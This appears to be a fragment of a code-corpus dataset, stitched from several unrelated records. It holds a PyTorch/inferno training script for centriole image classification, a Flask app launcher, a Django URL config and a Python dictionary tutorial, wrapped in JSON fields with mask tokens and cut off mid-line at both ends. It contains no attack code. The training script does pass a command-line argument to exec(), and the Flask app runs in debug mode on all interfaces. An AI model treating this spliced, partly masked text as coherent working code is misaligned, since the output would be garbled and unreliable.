log_info('Test bags dataset is used')\n else:\n train_ds = CentriollesDatasetOn(transform=train_tr, pos_dir=\n 'dataset/artificial/train_pos/', neg_dir=\n 'dataset/artificial/train_neg/', inp_size=args.img_size,\n all_data=True)\n test_ds = CentriollesDatasetOn(transform=test_tr, pos_dir=\n 'dataset/artificial/test_pos/', neg_dir=\n 'dataset/artificial/test_neg/', inp_size=args.img_size,\n all_data=True)\n log_info('ILC dataset is used')\n train_dl = DataLoader(train_ds, batch_size=4, shuffle=True, num_workers=0)\n test_dl = DataLoader(test_ds, batch_size=4, shuffle=True, num_workers=0)\n log_info('Datasets are initialized!')\n exec('model = impl_models.%s' % args.model_name)\n model_dir = os.path.join('models', args.model_name)\n curent_model_dir = os.path.join(model_dir, args.id)\n log_info('Model will be saved to %s' % curent_model_dir)\n log_info(' + Number of params: {}'.format(sum([p.data.nelement() for p in\n model.parameters()])))\n weight_dir = os.path.join(curent_model_dir, 'weights')\n log_info('Weights will be saved to %s' % weight_dir)\n if not os.path.exists(weight_dir):\n os.mkdir(weight_dir)\n logs_dir = os.path.join(curent_model_dir, 'logs')\n if not os.path.exists(logs_dir):\n os.mkdir(logs_dir)\n log_info('Logs will be saved to %s' % logs_dir)\n logger = TensorboardLogger(log_scalars_every=(1, 'iteration'),\n log_images_every=(np.inf, 'epochs'))\n\n def log_histogram(self, tag, values, bins=1000):\n pass\n logger.log_histogram = log_histogram\n trainer = Trainer(model).build_criterion('CrossEntropyLoss').build_metric(\n 'CategoricalError').build_optimizer('Adam').validate_every((2,\n 'epochs')).save_every((5, 'epochs')).save_to_directory(weight_dir\n ).set_max_num_epochs(10000).build_logger(logger, log_directory=logs_dir\n ).register_callback(AutoLR(0.96, (1, 'epochs'), monitor_momentum=\n 0.9, monitor_while='validating',\n consider_improvement_with_respect_to='best'))\n trainer.bind_loader('train', train_dl).bind_loader('validate', test_dl)\n if torch.cuda.is_available():\n trainer.cuda()\n trainer.fit()\n",
"step-4": "#!/g/kreshuk/lukoianov/miniconda3/envs/inferno/bin/python3\n\n# BASIC IMPORTS\nimport argparse\nimport os\nimport subprocess\nimport sys\nimport numpy as np\n\n# INTERNAL IMPORTS\nfrom src.datasets import CentriollesDatasetOn, CentriollesDatasetBags, GENdataset\nfrom src.utils import get_basic_transforms, log_info, get_resps_transforms\nimport src.implemented_models as impl_models\n\n# INFERNO IMPORTS\nimport torch\nfrom inferno.trainers.basic import Trainer\nfrom torch.utils.data import DataLoader\nfrom inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger\nfrom inferno.trainers.callbacks.scheduling import AutoLR\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Run learning of simple CNN implementation')\n\n parser.add_argument('--model_name', type=str, default='', help='Name of the model from models dir')\n parser.add_argument('--test', action='store_true', help='Test this model on simpler dataset')\n parser.add_argument('--features', action='store_true', help='Representation of repsponces')\n parser.add_argument('--mil', action='store_true', help='Continue learning on the bag lavel')\n parser.add_argument('--id', type=str, default='default', help='Unique net id to save')\n parser.add_argument('--img_size', type=int, default=60, help='Size of input images')\n\n args = parser.parse_args()\n log_info('Params: ' + str(args))\n\n if args.mil:\n train_tr, test_tr = get_resps_transforms(features=args.features)\n if args.test:\n train_ds = GENdataset(transform=train_tr, bags=False, crop=True)\n test_ds = GENdataset(train=False, transform=test_tr, bags=False, crop=True)\n log_info('Artificial MIL data is used')\n else:\n train_ds = CentriollesDatasetBags(transform=train_tr,\n inp_size=512, bags=False, crop=True)\n test_ds = CentriollesDatasetBags(train=False, transform=test_tr,\n inp_size=512, bags=False, crop=True)\n log_info('MIL dataset is used')\n else:\n train_tr, test_tr = get_basic_transforms()\n if args.test:\n train_ds = CentriollesDatasetOn(transform=train_tr,\n pos_dir='dataset/mnist/1',\n neg_dir='dataset/mnist/0', inp_size=args.img_size)\n test_ds = CentriollesDatasetOn(transform=test_tr,\n pos_dir='dataset/mnist/1',\n neg_dir='dataset/mnist/0', inp_size=args.img_size, train=False)\n log_info('Test bags dataset is used')\n else:\n train_ds = CentriollesDatasetOn(transform=train_tr,\n pos_dir='dataset/artificial/train_pos/',\n neg_dir='dataset/artificial/train_neg/',\n inp_size=args.img_size, all_data=True)\n test_ds = CentriollesDatasetOn(transform=test_tr,\n pos_dir='dataset/artificial/test_pos/',\n neg_dir='dataset/artificial/test_neg/',\n inp_size=args.img_size, all_data=True)\n log_info('ILC dataset is used')\n\n train_dl = DataLoader(train_ds, batch_size=4, shuffle=True, num_workers=0)\n test_dl = DataLoader(test_ds, batch_size=4, shuffle=True, num_workers=0)\n\n log_info('Datasets are initialized!')\n\n # DIRS AND MODEL\n exec(\"model = impl_models.%s\" % (args.model_name))\n\n model_dir = os.path.join('models', args.model_name)\n curent_model_dir = os.path.join(model_dir, args.id)\n log_info('Model will be saved to %s' % (curent_model_dir))\n log_info(' + Number of params: {}'.format(sum([p.data.nelement() for p in model.parameters()])))\n\n weight_dir = os.path.join(curent_model_dir, 'weights')\n log_info('Weights will be saved to %s' % (weight_dir))\n if not os.path.exists(weight_dir):\n os.mkdir(weight_dir)\n logs_dir = os.path.join(curent_model_dir, 'logs')\n if not os.path.exists(logs_dir):\n os.mkdir(logs_dir)\n log_info('Logs will be saved to %s' % (logs_dir))\n\n # Build trainer\n logger = TensorboardLogger(log_scalars_every=(1, 'iteration'),\n log_images_every=(np.inf, 'epochs'))\n\n def log_histogram(self, tag, values, bins=1000):\n pass\n logger.log_histogram = log_histogram\n\n trainer = Trainer(model)\\\n .build_criterion('CrossEntropyLoss') \\\n .build_metric('CategoricalError') \\\n .build_optimizer('Adam') \\\n .validate_every((2, 'epochs')) \\\n .save_every((5, 'epochs')) \\\n .save_to_directory(weight_dir) \\\n .set_max_num_epochs(10000) \\\n .build_logger(logger, log_directory=logs_dir) \\\n .register_callback(AutoLR(0.96, (1, 'epochs'), monitor_momentum=0.9,\n monitor_while='validating',\n consider_improvement_with_respect_to='best'))\n\n # Bind loaders\n trainer \\\n .bind_loader('train', train_dl) \\\n .bind_loader('validate', test_dl)\n\n if torch.cuda.is_available():\n trainer.cuda()\n\n trainer.fit()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from app import create_app
from app.config import Config
app = create_app(Config)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000, debug=True)
|
normal
|
{
"blob_id": "bea90bbcd4d34b64c21f022b6f3af2bee2d978e4",
"index": 1123,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n",
"step-3": "<mask token>\napp = create_app(Config)\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n",
"step-4": "from app import create_app\nfrom app.config import Config\napp = create_app(Config)\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n",
"step-5": "from app import create_app\nfrom app.config import Config\n\n\napp = create_app(Config)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000, debug=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app_name = 'user'
urlpatterns = [url('^$', views.index, name='index'), url('login/', views.
login, name='login'), url('regist/', views.regist, name='regist'), url(
'^getuser\\w*/(?P<id>\\d*)', views.getUserById, name='getuser'), url(
'^sendmessage\\w*/(?P<user_telephone>\\d*)', views.sendMessage, name=
'sendmessage'), url('gettoken', views.getUserbyToken, name=
'getUserbyToken')]
<|reserved_special_token_1|>
from django.conf.urls import url
from . import views
app_name = 'user'
urlpatterns = [url('^$', views.index, name='index'), url('login/', views.
login, name='login'), url('regist/', views.regist, name='regist'), url(
'^getuser\\w*/(?P<id>\\d*)', views.getUserById, name='getuser'), url(
'^sendmessage\\w*/(?P<user_telephone>\\d*)', views.sendMessage, name=
'sendmessage'), url('gettoken', views.getUserbyToken, name=
'getUserbyToken')]
<|reserved_special_token_1|>
from django.conf.urls import url
from .import views
app_name='user'
# user子路由
urlpatterns = [
# user首页
url(r'^$',views.index,name='index'),
# 用户登录
url('login/', views.login, name='login'),
# 用户注册
url('regist/', views.regist, name='regist'),
# 根据id判断用户是否存在
url(r'^getuser\w*/(?P<id>\d*)', views.getUserById, name='getuser'),
# 获取短信验证接口
url(r'^sendmessage\w*/(?P<user_telephone>\d*)',views.sendMessage,name='sendmessage'),
# 根据token查询一定的用户信息 postRight
url(r'gettoken', views.getUserbyToken, name='getUserbyToken'),
]
|
flexible
|
{
"blob_id": "de7b5e44c5c213e4ab70b0f8c0c402edaf4926e0",
"index": 211,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp_name = 'user'\nurlpatterns = [url('^$', views.index, name='index'), url('login/', views.\n login, name='login'), url('regist/', views.regist, name='regist'), url(\n '^getuser\\\\w*/(?P<id>\\\\d*)', views.getUserById, name='getuser'), url(\n '^sendmessage\\\\w*/(?P<user_telephone>\\\\d*)', views.sendMessage, name=\n 'sendmessage'), url('gettoken', views.getUserbyToken, name=\n 'getUserbyToken')]\n",
"step-3": "from django.conf.urls import url\nfrom . import views\napp_name = 'user'\nurlpatterns = [url('^$', views.index, name='index'), url('login/', views.\n login, name='login'), url('regist/', views.regist, name='regist'), url(\n '^getuser\\\\w*/(?P<id>\\\\d*)', views.getUserById, name='getuser'), url(\n '^sendmessage\\\\w*/(?P<user_telephone>\\\\d*)', views.sendMessage, name=\n 'sendmessage'), url('gettoken', views.getUserbyToken, name=\n 'getUserbyToken')]\n",
"step-4": "\nfrom django.conf.urls import url\nfrom .import views\n\napp_name='user'\n# user子路由\nurlpatterns = [\n\n # user首页\n url(r'^$',views.index,name='index'),\n\n # 用户登录\n url('login/', views.login, name='login'),\n\n # 用户注册\n url('regist/', views.regist, name='regist'),\n\n # 根据id判断用户是否存在\n url(r'^getuser\\w*/(?P<id>\\d*)', views.getUserById, name='getuser'),\n\n # 获取短信验证接口\n url(r'^sendmessage\\w*/(?P<user_telephone>\\d*)',views.sendMessage,name='sendmessage'),\n\n # 根据token查询一定的用户信息 postRight\n url(r'gettoken', views.getUserbyToken, name='getUserbyToken'),\n\n\n\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Main:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def func():
pass
class Main:
def __init__(self):
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def func():
pass
class Main:
def __init__(self):
pass
if __name__ == '__main__':
pass
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d['spam'])
print(d)
print(len(d))
print('ham' in d)
print(list(d.keys()))
print(list(d.values()))
print(list(d.items()))
for i in d.items():
print(i)
<|reserved_special_token_0|>
print(d)
del d['eggs']
print(d)
<|reserved_special_token_0|>
print(d)
print(list(d.values()))
print(list(d.keys()))
print(list(d.items()))
print(d.get('ham'))
print(d.get('toast'))
print(d.get('toast', 88))
print(d)
<|reserved_special_token_0|>
d.update(d2)
print(d)
print(d.pop('muffin'))
print(d.pop('toast'))
print(d)
<|reserved_special_token_0|>
print(movie)
for year in table:
print(year + '\t' + table[year])
<|reserved_special_token_0|>
print(table2['Holy Grail'])
print(list(table2.items()))
<|reserved_special_token_0|>
print(year_)
<|reserved_special_token_0|>
print(table2[K])
<|reserved_special_token_0|>
print(key)
<|reserved_special_token_0|>
print(key)
<|reserved_special_token_0|>
print(z_)
print(Matrix)
if (2, 3, 6) in Matrix:
print(Matrix[2, 3, 6])
else:
print(0)
try:
print(Matrix[2, 3, 6])
except KeyError:
print(0)
print(Matrix.get((2, 3, 4), 0))
print(Matrix.get((2, 3, 6), 0))
<|reserved_special_token_0|>
print(rec['name'])
<|reserved_special_token_0|>
print(rec['name'])
print(rec['jobs'])
print(rec['jobs'][1])
print(rec['home']['zip'])
<|reserved_special_token_0|>
db.append(rec)
db.append(other)
print(db[0]['jobs'])
<|reserved_special_token_0|>
db['bob']['jobs']
<|reserved_special_token_0|>
print(age_)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(di)
<|reserved_special_token_0|>
print(di)
<|reserved_special_token_0|>
print(fromkeys)
<|reserved_special_token_0|>
print(iterator)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d2)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(k)
print(list(k)[0])
<|reserved_special_token_0|>
print(v)
print(list(v))
print(d.items())
print(list(d.items()))
for k in d.keys():
print(k)
for key in d:
print(key)
print(d)
<|reserved_special_token_0|>
print(Ks)
<|reserved_special_token_0|>
Ks.sort()
print(Ks)
for k in Ks:
print(k, d[k])
print('-------' * 6)
<|reserved_special_token_0|>
for k in sorted(Ks):
print(k, D[k])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def func():
pass
class Main:
def __init__(self):
pass
if __name__ == '__main__':
pass
d = {'name': 'Bob', 'age': 40}
print(d)
d = {'spam': 2, 'ham': 1, 'eggs': 3}
print(d['spam'])
print(d)
print(len(d))
print('ham' in d)
print(list(d.keys()))
print(list(d.values()))
print(list(d.items()))
for i in d.items():
print(i)
d['ham'] = ['grill', 'bake', 'fry']
print(d)
del d['eggs']
print(d)
d['brunch'] = 'Bacon'
print(d)
print(list(d.values()))
print(list(d.keys()))
print(list(d.items()))
print(d.get('ham'))
print(d.get('toast'))
print(d.get('toast', 88))
print(d)
d2 = {'toast': 4, 'muffin': 5}
d.update(d2)
print(d)
print(d.pop('muffin'))
print(d.pop('toast'))
print(d)
table = {'1975': 'Holy Grail', '1979': 'Life of Brain', '1983':
'The Meaning of Life'}
year = '1983'
movie = table[year]
print(movie)
for year in table:
print(year + '\t' + table[year])
table2 = {'Holy Grail': '1975', 'Life of Brain': '1979',
'The Meaning of Life': '1983'}
print(table2['Holy Grail'])
print(list(table2.items()))
year_ = [title for title, year in table2.items() if year == '1975']
print(year_)
K = 'Holy Grail'
print(table2[K])
V = '1975'
key = [key for key, value in table2.items() if value == V]
print(key)
key = [key for key in table2.keys() if table2[key] == V]
print(key)
Matrix = {}
Matrix[2, 3, 4] = 88
Matrix[7, 8, 9] = 99
X = 2
Y = 3
Z = 4
z_ = Matrix[X, Y, Z]
print(z_)
print(Matrix)
if (2, 3, 6) in Matrix:
print(Matrix[2, 3, 6])
else:
print(0)
try:
print(Matrix[2, 3, 6])
except KeyError:
print(0)
print(Matrix.get((2, 3, 4), 0))
print(Matrix.get((2, 3, 6), 0))
rec = {}
rec['name'] = 'Bob'
rec['age'] = 40.5
rec['job'] = 'developer/manager'
print(rec['name'])
rec = {'name': 'Bob', 'jobs': ['developer', 'manager'], 'web':
'www.bobs.org/?Bob', 'home': {'state': 'Overworked', 'zip': 12345}}
print(rec['name'])
print(rec['jobs'])
print(rec['jobs'][1])
print(rec['home']['zip'])
db = []
other = {'name': 'other', 'jobs': ['hr', 'manager'], 'web': 'www.hr.org',
'home': {'state': 'Overworked', 'zip': 55555}}
db.append(rec)
db.append(other)
print(db[0]['jobs'])
db = {}
db['bob'] = rec
db['sue'] = other
db['bob']['jobs']
age_ = {'name': 'Bob', 'age': 40}
print(age_)
d = {}
d['name'] = 'sue'
d['age'] = 50
print(d)
di = dict(name='Bob', age=56)
print(di)
di = dict([('name', 'Bob'), ('age', 55)])
print(di)
fromkeys = dict.fromkeys(['a', 'b'], 0)
print(fromkeys)
iterator = zip(['a', 'b', 'c'], [1, 2, 3])
print(iterator)
d = dict(zip(['a', 'b', 'c'], [1, 2, 3]))
print(d)
d = {k: v for k, v in zip(['a', 'b', 'c'], [1, 2, 3])}
print(d)
d = {x: (x ** 2) for x in [1, 2, 3, 4]}
print(d)
d2 = {x: (x ** 2) for x in range(4)}
print(d2)
d = {c: (c * 4) for c in 'SPAM'}
print(d)
d = {c.lower(): (c + '!') for c in ['spam', 'eggs', 'ham']}
print(d)
d = dict.fromkeys(['a', 'b', 'c'], 0)
print(d)
d = {k: (0) for k in ['a', 'b', 'c']}
print(d)
d = dict.fromkeys('spam')
print(d)
d = dict.fromkeys('spam', 0)
print(d)
d = {k: None for k in 'spam'}
print(d)
d = dict(a=1, b=2, c=3)
print(d)
k = d.keys()
print(k)
print(list(k)[0])
v = d.values()
print(v)
print(list(v))
print(d.items())
print(list(d.items()))
for k in d.keys():
print(k)
for key in d:
print(key)
print(d)
Ks = d.keys()
print(Ks)
Ks = list(Ks)
Ks.sort()
print(Ks)
for k in Ks:
print(k, d[k])
print('-------' * 6)
D = {'b': 2, 'c': 3, 'a': 1}
Ks = D.keys()
for k in sorted(Ks):
print(k, D[k])
<|reserved_special_token_1|>
#!/usr/bin/env python3
# encoding: utf-8
"""
@version: ??
@author: ami
@license: Apache Licence
@file: dictTest.py
@time: 2019/9/25 18:26
@tools: PyCharm
"""
def func():
pass
class Main():
def __init__(self):
pass
if __name__ == '__main__':
pass
d = {'name': 'Bob', 'age': 40}
print(d)
d = {'spam': 2, 'ham': 1, 'eggs': 3}
print(d['spam'])
print(d)
print(len(d))
print('ham' in d)
print(list(d.keys()))
print(list(d.values()))
print(list(d.items()))
for i in d.items():
print(i)
d['ham'] = ['grill', 'bake', 'fry']
print(d)
del d['eggs']
print(d)
d['brunch'] = 'Bacon'
print(d)
print(list(d.values()))
print(list(d.keys()))
print(list(d.items()))
print(d.get('ham'))
print(d.get('toast'))
print(d.get('toast', 88))
print(d)
d2 = {'toast': 4, 'muffin': 5}
d.update(d2)
print(d)
print(d.pop('muffin'))
print(d.pop('toast'))
print(d)
table = {
'1975': 'Holy Grail',
'1979': 'Life of Brain',
'1983': 'The Meaning of Life'
}
year = '1983'
movie = table[year]
print(movie)
for year in table:
print(year + '\t' + table[year])
table2 = {
'Holy Grail': '1975',
'Life of Brain': '1979',
'The Meaning of Life': '1983'
}
print(table2['Holy Grail'])
print(list(table2.items()))
year_ = [title for (title, year) in table2.items() if year == '1975']
print(year_)
K = 'Holy Grail'
print(table2[K])
V = '1975'
key = [key for (key, value) in table2.items() if value == V]
print(key)
key = [key for key in table2.keys() if table2[key] == V]
print(key)
Matrix = {}
Matrix[(2, 3, 4)] = 88
Matrix[(7, 8, 9)] = 99
X = 2
Y = 3
Z = 4
z_ = Matrix[(X, Y, Z)]
print(z_)
print(Matrix)
if (2, 3, 6) in Matrix:
print(Matrix[(2, 3, 6)])
else:
print(0)
try:
print(Matrix[(2, 3, 6)])
except KeyError:
print(0)
print(Matrix.get((2, 3, 4), 0))
print(Matrix.get((2, 3, 6), 0))
rec = {}
rec['name'] = 'Bob'
rec['age'] = 40.5
rec['job'] = 'developer/manager'
print(rec['name'])
rec = {
'name': 'Bob',
'jobs': ['developer', 'manager'],
'web': 'www.bobs.org/?Bob',
'home': {'state': 'Overworked', 'zip': 12345}
}
print(rec['name'])
print(rec['jobs'])
print(rec['jobs'][1])
print(rec['home']['zip'])
db = []
other = {
'name': 'other',
'jobs': ['hr', 'manager'],
'web': 'www.hr.org',
'home': {'state': 'Overworked', 'zip': 55555}
}
db.append(rec)
db.append(other)
print(db[0]['jobs'])
db = {}
db['bob'] = rec
db['sue'] = other
db['bob']['jobs']
age_ = {'name': 'Bob', 'age': 40}
print(age_)
d = {}
d['name'] = 'sue'
d['age'] = 50
print(d)
di = dict(name='Bob', age=56)
print(di)
di = dict([('name', 'Bob'), ('age', 55)])
print(di)
fromkeys = dict.fromkeys(['a', 'b'], 0)
print(fromkeys)
iterator = zip(['a', 'b', 'c'], [1, 2, 3])
print(iterator)
d = dict(zip(['a', 'b', 'c'], [1, 2, 3]))
print(d)
d = {k: v for (k, v) in zip(['a', 'b', 'c'], [1, 2, 3])}
print(d)
d = {x: x ** 2 for x in [1, 2, 3, 4]}
print(d)
d2 = {x: x ** 2 for x in range(4)}
print(d2)
d = {c: c * 4 for c in 'SPAM'}
print(d)
d = {c.lower(): c + '!' for c in ['spam', 'eggs', 'ham']}
print(d)
d = dict.fromkeys(['a', 'b', 'c'], 0)
print(d)
d = {k: 0 for k in ['a', 'b', 'c']}
print(d)
d = dict.fromkeys('spam')
print(d)
d = dict.fromkeys('spam', 0)
print(d)
d = {k: None for k in 'spam'}
print(d)
d = dict(a=1, b=2, c=3)
print(d)
k = d.keys()
print(k)
# print(k[0])
print(list(k)[0])
v = d.values()
print(v)
print(list(v))
print(d.items())
print(list(d.items()))
for k in d.keys(): print(k)
for key in d: print(key)
# 排序{'a': 1, 'b': 2, 'c': 3}
print(d)
Ks = d.keys()
print(Ks)
Ks = list(Ks)
Ks.sort()
print(Ks)
for k in Ks: print(k, d[k])
print("-------"*6)
D = {'b': 2, 'c': 3, 'a': 1}
Ks = D.keys()
for k in sorted(Ks): print(k, D[k])
|
flexible
|
{
"blob_id": "797cedc9dc2a47713b9554e4f5975a4505ecf6d3",
"index": 9568,
"step-1": "<mask token>\n\n\nclass Main:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\nif __name__ == '__main__':\n pass\n<mask token>\nprint(d)\n<mask token>\nprint(d['spam'])\nprint(d)\nprint(len(d))\nprint('ham' in d)\nprint(list(d.keys()))\nprint(list(d.values()))\nprint(list(d.items()))\nfor i in d.items():\n print(i)\n<mask token>\nprint(d)\ndel d['eggs']\nprint(d)\n<mask token>\nprint(d)\nprint(list(d.values()))\nprint(list(d.keys()))\nprint(list(d.items()))\nprint(d.get('ham'))\nprint(d.get('toast'))\nprint(d.get('toast', 88))\nprint(d)\n<mask token>\nd.update(d2)\nprint(d)\nprint(d.pop('muffin'))\nprint(d.pop('toast'))\nprint(d)\n<mask token>\nprint(movie)\nfor year in table:\n print(year + '\\t' + table[year])\n<mask token>\nprint(table2['Holy Grail'])\nprint(list(table2.items()))\n<mask token>\nprint(year_)\n<mask token>\nprint(table2[K])\n<mask token>\nprint(key)\n<mask token>\nprint(key)\n<mask token>\nprint(z_)\nprint(Matrix)\nif (2, 3, 6) in Matrix:\n print(Matrix[2, 3, 6])\nelse:\n print(0)\ntry:\n print(Matrix[2, 3, 6])\nexcept KeyError:\n print(0)\nprint(Matrix.get((2, 3, 4), 0))\nprint(Matrix.get((2, 3, 6), 0))\n<mask token>\nprint(rec['name'])\n<mask token>\nprint(rec['name'])\nprint(rec['jobs'])\nprint(rec['jobs'][1])\nprint(rec['home']['zip'])\n<mask token>\ndb.append(rec)\ndb.append(other)\nprint(db[0]['jobs'])\n<mask token>\ndb['bob']['jobs']\n<mask token>\nprint(age_)\n<mask token>\nprint(d)\n<mask token>\nprint(di)\n<mask token>\nprint(di)\n<mask token>\nprint(fromkeys)\n<mask token>\nprint(iterator)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d2)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(k)\nprint(list(k)[0])\n<mask token>\nprint(v)\nprint(list(v))\nprint(d.items())\nprint(list(d.items()))\nfor k in d.keys():\n print(k)\nfor key in d:\n print(key)\nprint(d)\n<mask token>\nprint(Ks)\n<mask token>\nKs.sort()\nprint(Ks)\nfor k in Ks:\n print(k, d[k])\nprint('-------' * 6)\n<mask token>\nfor k in sorted(Ks):\n print(k, D[k])\n",
"step-4": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\nif __name__ == '__main__':\n pass\nd = {'name': 'Bob', 'age': 40}\nprint(d)\nd = {'spam': 2, 'ham': 1, 'eggs': 3}\nprint(d['spam'])\nprint(d)\nprint(len(d))\nprint('ham' in d)\nprint(list(d.keys()))\nprint(list(d.values()))\nprint(list(d.items()))\nfor i in d.items():\n print(i)\nd['ham'] = ['grill', 'bake', 'fry']\nprint(d)\ndel d['eggs']\nprint(d)\nd['brunch'] = 'Bacon'\nprint(d)\nprint(list(d.values()))\nprint(list(d.keys()))\nprint(list(d.items()))\nprint(d.get('ham'))\nprint(d.get('toast'))\nprint(d.get('toast', 88))\nprint(d)\nd2 = {'toast': 4, 'muffin': 5}\nd.update(d2)\nprint(d)\nprint(d.pop('muffin'))\nprint(d.pop('toast'))\nprint(d)\ntable = {'1975': 'Holy Grail', '1979': 'Life of Brain', '1983':\n 'The Meaning of Life'}\nyear = '1983'\nmovie = table[year]\nprint(movie)\nfor year in table:\n print(year + '\\t' + table[year])\ntable2 = {'Holy Grail': '1975', 'Life of Brain': '1979',\n 'The Meaning of Life': '1983'}\nprint(table2['Holy Grail'])\nprint(list(table2.items()))\nyear_ = [title for title, year in table2.items() if year == '1975']\nprint(year_)\nK = 'Holy Grail'\nprint(table2[K])\nV = '1975'\nkey = [key for key, value in table2.items() if value == V]\nprint(key)\nkey = [key for key in table2.keys() if table2[key] == V]\nprint(key)\nMatrix = {}\nMatrix[2, 3, 4] = 88\nMatrix[7, 8, 9] = 99\nX = 2\nY = 3\nZ = 4\nz_ = Matrix[X, Y, Z]\nprint(z_)\nprint(Matrix)\nif (2, 3, 6) in Matrix:\n print(Matrix[2, 3, 6])\nelse:\n print(0)\ntry:\n print(Matrix[2, 3, 6])\nexcept KeyError:\n print(0)\nprint(Matrix.get((2, 3, 4), 0))\nprint(Matrix.get((2, 3, 6), 0))\nrec = {}\nrec['name'] = 'Bob'\nrec['age'] = 40.5\nrec['job'] = 'developer/manager'\nprint(rec['name'])\nrec = {'name': 'Bob', 'jobs': ['developer', 'manager'], 'web':\n 'www.bobs.org/?Bob', 'home': {'state': 'Overworked', 'zip': 12345}}\nprint(rec['name'])\nprint(rec['jobs'])\nprint(rec['jobs'][1])\nprint(rec['home']['zip'])\ndb = []\nother = {'name': 'other', 'jobs': ['hr', 'manager'], 'web': 'www.hr.org',\n 'home': {'state': 'Overworked', 'zip': 55555}}\ndb.append(rec)\ndb.append(other)\nprint(db[0]['jobs'])\ndb = {}\ndb['bob'] = rec\ndb['sue'] = other\ndb['bob']['jobs']\nage_ = {'name': 'Bob', 'age': 40}\nprint(age_)\nd = {}\nd['name'] = 'sue'\nd['age'] = 50\nprint(d)\ndi = dict(name='Bob', age=56)\nprint(di)\ndi = dict([('name', 'Bob'), ('age', 55)])\nprint(di)\nfromkeys = dict.fromkeys(['a', 'b'], 0)\nprint(fromkeys)\niterator = zip(['a', 'b', 'c'], [1, 2, 3])\nprint(iterator)\nd = dict(zip(['a', 'b', 'c'], [1, 2, 3]))\nprint(d)\nd = {k: v for k, v in zip(['a', 'b', 'c'], [1, 2, 3])}\nprint(d)\nd = {x: (x ** 2) for x in [1, 2, 3, 4]}\nprint(d)\nd2 = {x: (x ** 2) for x in range(4)}\nprint(d2)\nd = {c: (c * 4) for c in 'SPAM'}\nprint(d)\nd = {c.lower(): (c + '!') for c in ['spam', 'eggs', 'ham']}\nprint(d)\nd = dict.fromkeys(['a', 'b', 'c'], 0)\nprint(d)\nd = {k: (0) for k in ['a', 'b', 'c']}\nprint(d)\nd = dict.fromkeys('spam')\nprint(d)\nd = dict.fromkeys('spam', 0)\nprint(d)\nd = {k: None for k in 'spam'}\nprint(d)\nd = dict(a=1, b=2, c=3)\nprint(d)\nk = d.keys()\nprint(k)\nprint(list(k)[0])\nv = d.values()\nprint(v)\nprint(list(v))\nprint(d.items())\nprint(list(d.items()))\nfor k in d.keys():\n print(k)\nfor key in d:\n print(key)\nprint(d)\nKs = d.keys()\nprint(Ks)\nKs = list(Ks)\nKs.sort()\nprint(Ks)\nfor k in Ks:\n print(k, d[k])\nprint('-------' * 6)\nD = {'b': 2, 'c': 3, 'a': 1}\nKs = D.keys()\nfor k in sorted(Ks):\n print(k, D[k])\n",
"step-5": "#!/usr/bin/env python3\r\n# encoding: utf-8\r\n\r\n\"\"\"\r\n@version: ??\r\n@author: ami\r\n@license: Apache Licence \r\n@file: dictTest.py\r\n@time: 2019/9/25 18:26\r\n@tools: PyCharm\r\n\"\"\"\r\n\r\n\r\ndef func():\r\n pass\r\n\r\n\r\nclass Main():\r\n def __init__(self):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n\r\nd = {'name': 'Bob', 'age': 40}\r\nprint(d)\r\n\r\nd = {'spam': 2, 'ham': 1, 'eggs': 3}\r\nprint(d['spam'])\r\nprint(d)\r\n\r\nprint(len(d))\r\nprint('ham' in d)\r\nprint(list(d.keys()))\r\nprint(list(d.values()))\r\nprint(list(d.items()))\r\n\r\nfor i in d.items():\r\n print(i)\r\n\r\nd['ham'] = ['grill', 'bake', 'fry']\r\nprint(d)\r\n\r\ndel d['eggs']\r\nprint(d)\r\nd['brunch'] = 'Bacon'\r\nprint(d)\r\n\r\nprint(list(d.values()))\r\nprint(list(d.keys()))\r\nprint(list(d.items()))\r\n\r\nprint(d.get('ham'))\r\nprint(d.get('toast'))\r\nprint(d.get('toast', 88))\r\nprint(d)\r\nd2 = {'toast': 4, 'muffin': 